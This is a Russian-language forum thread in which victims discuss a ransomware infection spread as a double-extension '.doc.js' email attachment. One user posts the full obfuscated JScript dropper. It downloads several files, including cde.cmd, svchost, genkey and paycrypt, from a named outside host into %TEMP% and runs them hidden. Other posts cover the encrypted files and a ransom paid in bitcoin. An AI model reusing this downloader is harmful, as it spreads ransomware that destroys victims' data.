[Kgtu5]

видимо оно же
http://virusinfo.info/showthread.php?t=158955

http://virusinfo.info/showthread.php?t=158940
http://forum.kaspersky.com/index.php?showtopic=294917

[CuxpecT]

Kgtu5, ага, только ничего толкового =\

[CuxpecT]

собсно если кто шарит в Js то вот сам файл скрипта. Буду рад, если расшифруете что конкретно по шагам он делает.

скрипт

Код:

var _0x495c="MSXML2.XMLHTTP onreadystatechange readyState ADODB.Stream open type write position saveToFile close GET send WScript.Shell %TEMP%\\ http://russmebelspb.com/index_files/document  document.doc http://russmebelspb.com/index_files/cde cde.cmd http://russmebelspb.com/index_files/svchost svchost.like http://russmebelspb.com/index_files/iconv iconv.dll http://russmebelspb.com/index_files/genkey genkey.like http://russmebelspb.com/index_files/secrypt secrypt.like http://russmebelspb.com/index_files/paycrypt paycrypt.like http://russmebelspb.com/index_files/javav javav.like http://russmebelspb.com/index_files/DEC01 DEC01 http://russmebelspb.com/index_files/DEC02 DEC02 http://russmebelspb.com/index_files/input2 input2.like http://russmebelspb.com/index_files/input1 input1.like".split(" ");
function Run(b){WshShell.Run(b,0,0)}function saveFile(b,d){var c=new ActiveXObject(_0x495c[0]);c[_0x495c[1]]=function(){if(4===c[_0x495c[2]]){var a=new ActiveXObject(_0x495c[3]);a[_0x495c[4]]();a[_0x495c[5]]=1;a[_0x495c[6]](c.ResponseBody);a[_0x495c[7]]=0;a[_0x495c[8]](d,2);a[_0x495c[9]]()}};c[_0x495c[4]](_0x495c[10],b,!1);c[_0x495c[11]]()}function CreateObject(b){return new ActiveXObject(b)}var WshShell=CreateObject(_0x495c[12]),DestinationFLE=_0x495c[13],DestinationFLE=WshShell.ExpandEnvironmentStrings(DestinationFLE);
saveFile(_0x495c[14],_0x495c[15]+DestinationFLE+_0x495c[16]);try{Run(_0x495c[15]+DestinationFLE+_0x495c[16])}catch(wrd){}saveFile(_0x495c[17],_0x495c[15]+DestinationFLE+_0x495c[18]);saveFile(_0x495c[19],_0x495c[15]+DestinationFLE+_0x495c[20]);saveFile(_0x495c[21],_0x495c[15]+DestinationFLE+_0x495c[22]);saveFile(_0x495c[23],_0x495c[15]+DestinationFLE+_0x495c[24]);saveFile(_0x495c[25],_0x495c[15]+DestinationFLE+_0x495c[26]);saveFile(_0x495c[27],_0x495c[15]+DestinationFLE+_0x495c[28]);
Run(_0x495c[15]+DestinationFLE+_0x495c[18]);saveFile(_0x495c[29],_0x495c[15]+DestinationFLE+_0x495c[30]);saveFile(_0x495c[31],_0x495c[15]+DestinationFLE+_0x495c[32]);saveFile(_0x495c[33],_0x495c[15]+DestinationFLE+_0x495c[34]);saveFile(_0x495c[35],_0x495c[15]+DestinationFLE+_0x495c[36]);saveFile(_0x495c[37],_0x495c[15]+DestinationFLE+_0x495c[38]);

[свернуть]

Появились мысли отключить\удалить службу\программу запуска скриптов, либо написать программу\батник\etc проверки на расширения файлов перед запуском. если js, то не пропускать. кто чем помочь может?

[anchous]

а как из архива может стартануть какой то файл или там был SFX с автозапуском?
какие файлы они шифруют ибо на шифрацию среднего диска по рса-1024 уйдет 6-8 часов
но все равно нормальный IPS должен блокировать попытки обращения к системе и файлам по 0-day

пробовали вытаскивать файлы с загрузочного диска или флехи?

[CuxpecT]

а как из архива может стартануть какой то файл или там был SFX с автозапуском?

в архиве файл "Проект Акта сверки просим ознакомиться и оплатить долг 27_06_2014 бухгалтерия сверка долг по старым поставкам и заказам ответьте по сумме 6843_dr.web_attachment.dос.js" Пользователи не видят второго расширения и открывают на исполнение. Текст скрипта постом выше.

какие файлы они шифруют ибо на шифрацию среднего диска по рса-1024 уйдет 6-8 часов

рандомно файлы на диске С, в моих документах, файлы на рабочем столе. Принцип, по которому отбирает файлы для шифрации пока не понял. Пример зашифрованных файлов в архиве в первом посте.

но все равно нормальный IPS должен блокировать попытки обращения к системе и файлам по 0-day

но не блокирует =\

пробовали вытаскивать файлы с загрузочного диска или флехи?

не пробовал, не пойму что это даст

[arhimed]

Не совсем в тему, но вставлю кое-какие наблюдения.
По некоторым причинам приходится пользоваться четырьмя дополнениями для хрома(в основном на нем). Среди них RDS Bar, Gismeteo, X New Tab Page, Webpage Screenshot.

Что было замечено: тематический спам на почту приходит. То есть, если в этой неделе меня интересовала инфа о том, как закрывается-открывается ИП, то мой ящик gmail атаковали всякого рода предложения от посредников. Сдается мне, что кое-кто отслеживает и сливает, причем это явно не скриншотики или гисметео. Такие дела.

[CuxpecT]

причем это явно не скриншотики или гисметео

юзаю рдс бар - спам, на который сам не подписывался, не замечал

[HaXaL]

Аналогичная хрень на работе, пришли к решению оплатить, в суд подавать не будем так как расчетный счет на обычную пластиковую карту, и 100% на левого человека...

[CuxpecT]

100% на левого человека...

но снимать-то бабло будет реальный. на месте и повязать

[HaXaL]

Вчера оплатил, до сих пор не прислали дешифратор, в стар посте я упустил инфу что оплата через биткоины, выйти на них вообще не реально, так как насколько я знаю, владельца кошелька биткоины, не как не вычислить.
З.Ы. Начинаю нервничать, но надежда на то что пришлют дешифратор еще осталась), скидывал им зашифрованные файлы в ответ получал от них нормальные, вывод они могут их расшифровать.